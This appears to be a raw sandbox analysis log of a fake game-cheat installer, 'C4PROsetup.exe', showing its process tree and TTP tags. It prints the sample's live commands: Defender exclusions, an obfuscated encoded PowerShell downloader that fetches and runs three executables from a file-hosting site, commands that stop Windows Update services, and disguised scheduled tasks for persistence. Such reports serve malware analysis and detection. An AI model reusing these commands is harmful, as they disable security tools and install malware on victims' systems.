PID 4588 wrote to memory of 612	4588	cmd.exe	88
PID 4588 wrote to memory of 612	4588	cmd.exe	88
PID 4588 wrote to memory of 612	4588	cmd.exe	88
PID 5076 wrote to memory of 996	5076	C4PROsetup.exe	89
PID 5076 wrote to memory of 996	5076	C4PROsetup.exe	89
PID 5076 wrote to memory of 996	5076	C4PROsetup.exe	89
PID 3048 wrote to memory of 5112	3048	C4PROsetup.exe	92
PID 3048 wrote to memory of 5112	3048	C4PROsetup.exe	92
PID 3048 wrote to memory of 5112	3048	C4PROsetup.exe	92
PID 3048 wrote to memory of 4880	3048	C4PROsetup.exe	94
PID 3048 wrote to memory of 4880	3048	C4PROsetup.exe	94
PID 3048 wrote to memory of 4880	3048	C4PROsetup.exe	94
PID 5112 wrote to memory of 4476	5112	cmd.exe	95
PID 5112 wrote to memory of 4476	5112	cmd.exe	95
PID 5112 wrote to memory of 4476	5112	cmd.exe	95
PID 3048 wrote to memory of 4944	3048	C4PROsetup.exe	96
PID 3048 wrote to memory of 4944	3048	C4PROsetup.exe	96
PID 3048 wrote to memory of 4944	3048	C4PROsetup.exe	96
PID 3048 wrote to memory of 4944	3048	C4PROsetup.exe	96
PID 3048 wrote to memory of 4944	3048	C4PROsetup.exe	96
PID 3048 wrote to memory of 4944	3048	C4PROsetup.exe	96
PID 3048 wrote to memory of 4944	3048	C4PROsetup.exe	96
PID 3048 wrote to memory of 4944	3048	C4PROsetup.exe	96
PID 4944 wrote to memory of 2008	4944	C4PROsetup.exe	97
PID 4944 wrote to memory of 2008	4944	C4PROsetup.exe	97
PID 4944 wrote to memory of 2008	4944	C4PROsetup.exe	97
PID 3068 wrote to memory of 4856	3068	Lglklaczv.exe	100
PID 3068 wrote to memory of 4856	3068	Lglklaczv.exe	100
PID 3068 wrote to memory of 4856	3068	Lglklaczv.exe	100
PID 3068 wrote to memory of 1588	3068	Lglklaczv.exe	101
PID 3068 wrote to memory of 1588	3068	Lglklaczv.exe	101
PID 3068 wrote to memory of 1588	3068	Lglklaczv.exe	101
PID 3068 wrote to memory of 1588	3068	Lglklaczv.exe	101
PID 3068 wrote to memory of 1588	3068	Lglklaczv.exe	101
PID 3068 wrote to memory of 1588	3068	Lglklaczv.exe	101
PID 3068 wrote to memory of 1588	3068	Lglklaczv.exe	101
PID 3068 wrote to memory of 1588	3068	Lglklaczv.exe	101
PID 1588 wrote to memory of 3836	1588	C4PROsetup.exe	103
PID 1588 wrote to memory of 3836	1588	C4PROsetup.exe	103
PID 1588 wrote to memory of 3836	1588	C4PROsetup.exe	103
PID 4856 wrote to memory of 3416	4856	cmd.exe	105
PID 4856 wrote to memory of 3416	4856	cmd.exe	105
PID 4856 wrote to memory of 3416	4856	cmd.exe	105
PID 996 wrote to memory of 3456	996	powershell.exe	106
PID 996 wrote to memory of 3456	996	powershell.exe	106
PID 996 wrote to memory of 3456	996	powershell.exe	106
PID 996 wrote to memory of 1432	996	powershell.exe	107

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3224
- C:\Windows\system32\LaunchWinApp.exe
  "C:\Windows\system32\LaunchWinApp.exe" "https://cheats4pro.com/file"
  2⤵
  PID:3756
- C:\Program Files\7-Zip\7zG.exe
  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\C4PROsetup\" -ad -an -ai#7zMap7276:82:7zEvent4495
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4092
- C:\Users\Admin\Desktop\C4PROsetup\C4PROsetup.exe
  "C:\Users\Admin\Desktop\C4PROsetup\C4PROsetup.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4816
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4588
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell set-mppreference -exclusionpath C:\
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:612
- - C:\Users\Admin\Desktop\C4PROsetup\C4PROsetup.exe
    C:\Users\Admin\Desktop\C4PROsetup\C4PROsetup.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:5076
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbQBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcgB3AHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbgB1AHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBhAHUAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdABvAHIAZQAxAC4AZwBvAGYAaQBsAGUALgBpAG8ALwBkAG8AdwBuAGwAbwBhAGQALwBkAGkAcgBlAGMAdAAvADcAMgA4ADAANABhAGIAMAAtAGMAOAAwAGEALQA0ADIAOAAzAC0AYgBkAGUAZgAtADIAMwAyADcAOAAzADUAZAAyADMAMgA3AC8AQwA0AC4AZQB4AGUAJwAsACAAPAAjAGgAdwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcwBpAGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZwBpAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AC4AZQB4AGUAJwApACkAPAAjAGQAZwBpACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdABvAHIAZQAxAC4AZwBvAGYAaQBsAGUALgBpAG8ALwBkAG8AdwBuAGwAbwBhAGQALwBkAGkAcgBlAGMAdAAvADQANQA2ADQANAA0ADUAZgAtAGYAZgAxADIALQA0ADAAZQA2AC0AYQAxADIANgAtAGMAMABlADEAZABiAGEANgBkADcAZAA2AC8ATABnAGwAawBsAGEAYwB6AHYALgBlAHgAZQAnACwAIAA8ACMAcwBmAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBzAG0AaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBqAGYAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGcAbABrAGwAYQBjAHoAdgAuAGUAeABlACcAKQApADwAIwByAHcAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBzAHQAbwByAGUAMQAuAGcAbwBmAGkAbABlAC4AaQBvAC8AZABvAHcAbgBsAG8AYQBkAC8AZABpAHIAZQBjAHQALwAxAGQAMgA1AGUAOAA1ADAALQBkADUANwA5AC0ANAA5ADIAMgAtAGIAMwBiADQALQA0AGUAZABhAGYAOAA2AGQAMgBkADEAOAAvAFUAcABkAGEAdABlAHIAcwAuAGUAeABlACcALAAgADwAIwBxAHkAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGwAaABjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFUAcABkAGEAdABlAHIAcwAuAGUAeABlACcAKQApADwAIwBqAHgAeQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAHgAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYQBoAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AC4AZQB4AGUAJwApADwAIwBwAGIAZgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwByAGIAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBoAGQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABnAGwAawBsAGEAYwB6AHYALgBlAHgAZQAnACkAPAAjAHAAaABuACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGkAcQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBuAGEAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBVAHAAZABhAHQAZQByAHMALgBlAHgAZQAnACkAPAAjAHkAeABkACMAPgA="
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:996
    - - C:\Users\Admin\AppData\Local\Temp\C4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\C4.exe"
        5⤵
        Executes dropped EXE
        
        PID:3456
    - - C:\Users\Admin\AppData\Local\Temp\Lglklaczv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Lglklaczv.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:1432
      - C:\Users\Admin\AppData\Local\Temp\Lglklaczv.exe
        
        C:\Users\Admin\AppData\Local\Temp\Lglklaczv.exe
        6⤵
        Executes dropped EXE
        
        PID:5060
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:660
    - - C:\Users\Admin\AppData\Local\Temp\Updaters.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Updaters.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Drops file in Drivers directory
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:4744
- C:\Users\Admin\Desktop\C4PROsetup\C4PROsetup.exe
  "C:\Users\Admin\Desktop\C4PROsetup\C4PROsetup.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3048
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5112
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell set-mppreference -exclusionpath C:\
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4476
- - C:\Users\Admin\Desktop\C4PROsetup\C4PROsetup.exe
    C:\Users\Admin\Desktop\C4PROsetup\C4PROsetup.exe
    3⤵
    - Executes dropped EXE
    PID:4880
- - C:\Users\Admin\Desktop\C4PROsetup\C4PROsetup.exe
    C:\Users\Admin\Desktop\C4PROsetup\C4PROsetup.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4944
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbQBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcgB3AHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbgB1AHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBhAHUAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdABvAHIAZQAxAC4AZwBvAGYAaQBsAGUALgBpAG8ALwBkAG8AdwBuAGwAbwBhAGQALwBkAGkAcgBlAGMAdAAvADcAMgA4ADAANABhAGIAMAAtAGMAOAAwAGEALQA0ADIAOAAzAC0AYgBkAGUAZgAtADIAMwAyADcAOAAzADUAZAAyADMAMgA3AC8AQwA0AC4AZQB4AGUAJwAsACAAPAAjAGgAdwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcwBpAGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZwBpAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AC4AZQB4AGUAJwApACkAPAAjAGQAZwBpACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdABvAHIAZQAxAC4AZwBvAGYAaQBsAGUALgBpAG8ALwBkAG8AdwBuAGwAbwBhAGQALwBkAGkAcgBlAGMAdAAvADQANQA2ADQANAA0ADUAZgAtAGYAZgAxADIALQA0ADAAZQA2AC0AYQAxADIANgAtAGMAMABlADEAZABiAGEANgBkADcAZAA2AC8ATABnAGwAawBsAGEAYwB6AHYALgBlAHgAZQAnACwAIAA8ACMAcwBmAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBzAG0AaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBqAGYAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGcAbABrAGwAYQBjAHoAdgAuAGUAeABlACcAKQApADwAIwByAHcAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBzAHQAbwByAGUAMQAuAGcAbwBmAGkAbABlAC4AaQBvAC8AZABvAHcAbgBsAG8AYQBkAC8AZABpAHIAZQBjAHQALwAxAGQAMgA1AGUAOAA1ADAALQBkADUANwA5AC0ANAA5ADIAMgAtAGIAMwBiADQALQA0AGUAZABhAGYAOAA2AGQAMgBkADEAOAAvAFUAcABkAGEAdABlAHIAcwAuAGUAeABlACcALAAgADwAIwBxAHkAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGwAaABjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFUAcABkAGEAdABlAHIAcwAuAGUAeABlACcAKQApADwAIwBqAHgAeQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAHgAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYQBoAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AC4AZQB4AGUAJwApADwAIwBwAGIAZgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwByAGIAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBoAGQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABnAGwAawBsAGEAYwB6AHYALgBlAHgAZQAnACkAPAAjAHAAaABuACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGkAcQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBuAGEAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBVAHAAZABhAHQAZQByAHMALgBlAHgAZQAnACkAPAAjAHkAeABkACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2008
    - - C:\Users\Admin\AppData\Local\Temp\C4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\C4.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:948
    - - C:\Users\Admin\AppData\Local\Temp\Lglklaczv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Lglklaczv.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3068
      - C:\Users\Admin\AppData\Local\Temp\Lglklaczv.exe
        
        C:\Users\Admin\AppData\Local\Temp\Lglklaczv.exe
        6⤵
        Executes dropped EXE
        
        PID:1884
    - - C:\Users\Admin\AppData\Local\Temp\Updaters.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Updaters.exe"
        5⤵
        Executes dropped EXE
        
        PID:1084
- C:\Users\Admin\Desktop\C4PROsetup\C4PROsetup.exe
  "C:\Users\Admin\Desktop\C4PROsetup\C4PROsetup.exe"
  2⤵
  PID:3068
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4856
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell set-mppreference -exclusionpath C:\
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3416
- - C:\Users\Admin\Desktop\C4PROsetup\C4PROsetup.exe
    C:\Users\Admin\Desktop\C4PROsetup\C4PROsetup.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1588
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbQBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcgB3AHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbgB1AHoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbQBhAHUAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdABvAHIAZQAxAC4AZwBvAGYAaQBsAGUALgBpAG8ALwBkAG8AdwBuAGwAbwBhAGQALwBkAGkAcgBlAGMAdAAvADcAMgA4ADAANABhAGIAMAAtAGMAOAAwAGEALQA0ADIAOAAzAC0AYgBkAGUAZgAtADIAMwAyADcAOAAzADUAZAAyADMAMgA3AC8AQwA0AC4AZQB4AGUAJwAsACAAPAAjAGgAdwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcwBpAGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZwBpAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AC4AZQB4AGUAJwApACkAPAAjAGQAZwBpACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHMAdABvAHIAZQAxAC4AZwBvAGYAaQBsAGUALgBpAG8ALwBkAG8AdwBuAGwAbwBhAGQALwBkAGkAcgBlAGMAdAAvADQANQA2ADQANAA0ADUAZgAtAGYAZgAxADIALQA0ADAAZQA2AC0AYQAxADIANgAtAGMAMABlADEAZABiAGEANgBkADcAZAA2AC8ATABnAGwAawBsAGEAYwB6AHYALgBlAHgAZQAnACwAIAA8ACMAcwBmAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBzAG0AaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBqAGYAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGcAbABrAGwAYQBjAHoAdgAuAGUAeABlACcAKQApADwAIwByAHcAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBzAHQAbwByAGUAMQAuAGcAbwBmAGkAbABlAC4AaQBvAC8AZABvAHcAbgBsAG8AYQBkAC8AZABpAHIAZQBjAHQALwAxAGQAMgA1AGUAOAA1ADAALQBkADUANwA5AC0ANAA5ADIAMgAtAGIAMwBiADQALQA0AGUAZABhAGYAOAA2AGQAMgBkADEAOAAvAFUAcABkAGEAdABlAHIAcwAuAGUAeABlACcALAAgADwAIwBxAHkAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGwAaABjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFUAcABkAGEAdABlAHIAcwAuAGUAeABlACcAKQApADwAIwBqAHgAeQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAHgAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYQBoAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AC4AZQB4AGUAJwApADwAIwBwAGIAZgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwByAGIAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBoAGQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABnAGwAawBsAGEAYwB6AHYALgBlAHgAZQAnACkAPAAjAHAAaABuACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGkAcQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBuAGEAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBVAHAAZABhAHQAZQByAHMALgBlAHgAZQAnACkAPAAjAHkAeABkACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3836
    - - C:\Users\Admin\AppData\Local\Temp\C4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\C4.exe"
        5⤵
        Executes dropped EXE
        
        PID:2984
    - - C:\Users\Admin\AppData\Local\Temp\Updaters.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Updaters.exe"
        5⤵
        Executes dropped EXE
        
        PID:4552
    - - C:\Users\Admin\AppData\Local\Temp\Lglklaczv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Lglklaczv.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:636
      - C:\Users\Admin\AppData\Local\Temp\Lglklaczv.exe
        
        C:\Users\Admin\AppData\Local\Temp\Lglklaczv.exe
        6⤵
        Executes dropped EXE
        
        PID:308
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:4024
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4804
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:4432
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1352
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3376
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2588
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1656
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3048
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /delete /f /tn "ChromeUpdateSmartMachine"
  2⤵
  PID:4400
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "ChromeUpdateSmartMachine" /xml "C:\Users\Admin\AppData\Local\Temp\utpmumacnqwe.xml"
  2⤵
  - Creates scheduled task(s)
  PID:2392

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4604

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- NTFS ADS
PID:4828

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4400

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
